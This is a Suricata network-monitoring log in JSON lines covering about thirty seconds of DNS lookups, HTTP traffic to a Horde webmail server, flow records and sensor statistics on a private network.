{"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.533751+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43745,"proto":"UDP","dns":{"type":"answer","id":56364,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:15:13.589999+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.612765+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":2}} {"timestamp":"2020-02-29T00:15:13.624275+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51156,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:15:13.729610+0000","flow_id":104855940204179,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50670,"proto":"UDP","dns":{"type":"answer","id":51156,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.763662+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17701,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:13.872716+0000","flow_id":978800180569870,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50520,"proto":"UDP","dns":{"type":"answer","id":17701,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} 
{"timestamp":"2020-02-29T00:15:13.900021+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:15:13.939863+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":3}} {"timestamp":"2020-02-29T00:15:14.111009+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34838,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19292,"tx_id":1}} {"timestamp":"2020-02-29T00:15:17.000641+0000","flow_id":1917516803235951,"event_type":"flow","src_ip":"192.168.10.122","src_port":34781,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:16.614511+0000","end":"2020-02-29T00:10:16.722829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:18.901872+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":3}} {"timestamp":"2020-02-29T00:15:18.902890+0000","flow_id":862814588722720,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34842,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} 
{"timestamp":"2020-02-29T00:15:19.000178+0000","event_type":"stats","stats":{"uptime":14571,"capture":{"kernel_packets":135935,"kernel_drops":0},"decoder":{"pkts":135937,"bytes":93547486,"invalid":188,"ipv4":134426,"ipv6":8,"ethernet":135937,"raw":0,"null":0,"sll":0,"tcp":129065,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099936},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2395,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":25125,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:22.000308+0000","flow_id":854757210952885,"event_type":"flow","src_ip":"192.168.10.122","src_port":41533,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:21.758965+0000","end":"2020-02-29T00:10:21.866749+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000280+0000","flow_id":1577625976740859,"event_type":"flow","src_ip":"192.168.10.122","src_port":44212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.629755+0000","end":"2020-02-29T00:10:22.738168+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:23.000607+0000","flow_id":1445628746846607,"event_type":"flow","src_ip":"192.168.10.122","src_port":42445,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.840079+0000","end":"2020-02-29T00:10:22.948426+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:24.000695+0000","flow_id":1378485523115176,"event_type":"flow","src_ip":"192.168.10.122","src_port":53812,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:22.978088+0000","end":"2020-02-29T00:10:23.086656+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:24.919104+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10440,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:25.027922+0000","flow_id":500671536956992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34200,"proto":"UDP","dns":{"type":"answer","id":10440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:25.153993+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994}} 
{"timestamp":"2020-02-29T00:15:26.000239+0000","event_type":"stats","stats":{"uptime":14578,"capture":{"kernel_packets":135939,"kernel_drops":0},"decoder":{"pkts":135941,"bytes":93547750,"invalid":188,"ipv4":134430,"ipv6":8,"ethernet":135941,"raw":0,"null":0,"sll":0,"tcp":129069,"udp":5158,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2787,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2803,"synack":2794,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1826,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2358,"failed_udp":112},"tx":{"http":4689,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2438}},"flow_mgr":{"closed_pruned":2767,"new_pruned":15,"est_pruned":2398,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":132277,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:27.000847+0000","flow_id":106655512661597,"event_type":"flow","src_ip":"192.168.10.122","src_port":52175,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:26.069213+0000","end":"2020-02-29T00:10:26.177585+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:27.481543+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7994},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":45876,"tx_id":0}} {"timestamp":"2020-02-29T00:15:27.489535+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39614,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:15:27.598059+0000","flow_id":816909979187263,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58159,"proto":"UDP","dns":{"type":"answer","id":39614,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:27.654066+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273}} {"timestamp":"2020-02-29T00:15:29.000300+0000","flow_id":1297456683777400,"event_type":"flow","src_ip":"192.168.10.130","src_port":34824,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":1153,"bytes_toclient":9222,"start":"2020-02-29T00:13:51.621944+0000","end":"2020-02-29T00:14:28.518250+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:32.654078+0000","flow_id":1221616157382490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8273},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":35273,"tx_id":1}} {"timestamp":"2020-02-29T00:15:33.000226+0000","event_type":"stats","stats":{"uptime":14585,"capture":{"kernel_packets":135960,"kernel_drops":0},"decoder":{"pkts":135974,"bytes":93568102,"invalid":188,"ipv4":134463,"ipv6":8,"ethernet":135974,"raw":0,"null":0,"sll":0,"tcp":129098,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2768,"new_pruned":15,"est_pruned":2400,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":46654,"
memcap":0}}} {"timestamp":"2020-02-29T00:15:35.000636+0000","flow_id":1080320319612926,"event_type":"flow","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":12,"bytes_toserver":1533,"bytes_toclient":9963,"start":"2020-02-29T00:14:28.518142+0000","end":"2020-02-29T00:14:34.691080+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:36.000855+0000","flow_id":1681976502983035,"event_type":"flow","src_ip":"192.168.10.122","src_port":35187,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:35.072059+0000","end":"2020-02-29T00:10:35.180346+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:40.000158+0000","event_type":"stats","stats":{"uptime":14592,"capture":{"kernel_packets":135976,"kernel_drops":0},"decoder":{"pkts":135977,"bytes":93568300,"invalid":188,"ipv4":134466,"ipv6":8,"ethernet":135977,"raw":0,"null":0,"sll":0,"tcp":129101,"udp":5162,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2788,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2804,"synack":2795,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1827,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2360,"failed_udp":112},"tx":{"http":4691,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2440}},"flow_mgr":{"closed_pruned":2769,"new_pruned":15,"est_pruned":2401,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23801,"memcap_state":0,"memcap_global":0},"http":{"memuse":46574,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:40.002310+0000","flow_id":54888288126643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:14:34.689843+0000","end":"2020-02-29T00:14:39.874407+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:41.000176+0000","flow_id":1207756279237984,"event_type":"flow","src_ip":"192.168.10.122","src_port":45590,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.249184+0000","end":"2020-02-29T00:10:39.357577+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:41.000427+0000","flow_id":2107843985516552,"event_type":"flow","src_ip":"192.168.10.122","src_port":47317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:10:39.436232+0000","end":"2020-02-29T00:10:39.544428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:44.000587+0000","flow_id":2049496855059110,"event_type":"flow","src_ip":"192.168.10.122","src_port":36997,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:43.170662+0000","end":"2020-02-29T00:10:43.278991+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
